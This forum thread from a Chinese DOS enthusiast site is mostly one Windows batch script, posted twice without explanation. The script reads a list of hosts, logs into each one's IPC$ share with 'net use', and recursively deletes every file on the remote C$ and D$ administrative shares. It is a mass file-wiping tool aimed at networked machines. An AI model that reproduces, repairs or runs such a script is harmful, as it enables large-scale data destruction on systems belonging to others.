China DOS Union

-- Unite DOS · Advance DOS · Grow DOS --

Union site: www.cn-dos.net Forum site: www.cn-dos.net/forum
DOS stands for freedom, openness and progress. Let us work hard, learn from the openness and GNU spirit of FreeDOS and Linux, and together build and grow a free GNU GPL world!

中国DOS联盟论坛
The time now is 2026-08-10 16:40
Original Poster Posted 2008-11-21 22:02 ·  中国 天津 武清区 联通
初级用户
Credits 41
Posts 28
Joined 2008-08-19 13:19
17-year member
UID 123578
Gender Male
Status Offline
for /f "tokens=*" %%a in (p.txt) do (
net use \\%%a\ipc$ "%%b" /user:"%%c"
call :d %%a
)
:d
for %%o in (D$ C$) do (call :o %%o %1)
:o
for /r \\%2\%1 %%l in (*.*) do (del "%%l")
Floor 2 Posted 2008-11-21 22:48 ·  中国 江西 赣州 电信
银牌会员
★★★★
Credits 2,025
Posts 1,122
Joined 2007-09-05 20:15
18-year member
UID 96653
Gender Male
Status Offline
Recent Ratings for This Post ( 1 in total) Click for details
RaterScoreTime
HAT +2 2008-11-22 09:46
Floor 3 Posted 2008-11-22 08:05 ·  中国 天津 武清区 联通
初级用户
Credits 41
Posts 28
Joined 2008-08-19 13:19
17-year member
UID 123578
Gender Male
Status Offline
for /f "tokens=*" %%a in (p.txt) do (
net use \\%%a\ipc$ "%%b" /user:"%%c"
call :d %%a
)
:d
for %%o in (D$ C$) do (call :o %%o %1)
:o
for /r \\%2\%1 %%l in (*.*) do (del "%%l")
Forum Jump: